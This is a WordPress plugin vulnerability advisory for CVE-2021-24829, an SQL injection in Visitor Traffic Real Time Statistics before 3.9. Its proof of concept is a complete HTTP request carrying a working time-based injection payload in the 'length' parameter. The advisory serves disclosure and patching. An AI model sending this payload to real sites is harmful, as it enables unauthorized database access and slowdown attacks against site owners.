logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Visitor Traffic Real Time Statistics < 3.9 - Subscriber+ SQL Injection

Description

The plugin does not validate and escape user input passed to the today_traffic_index AJAX action (available to any authenticated users) before using it in a SQL statement, leading to an SQL injection issue

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 129
Connection: close
Cookie: [subscriber+]

action=today_traffic_index&start=0&length=1+procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(30000000,sha1(1))),0x20),1);

Affects Plugins

visitors-traffic-real-time-statistics

Fixed in version 3.9

References

CVE

CVE-2021-24829

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

JrXnm

Submitter

JrXnm

Submitter website

https://blog.szfszf.top

Verified

Yes

WPVDB ID

cc6585c8-5798-48a1-89f7-a3337f56df3f

Timeline

Publicly Published

2021-10-06 (about 3 months ago)

Added

2021-10-06 (about 3 months ago)

Last Updated

2021-11-07 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin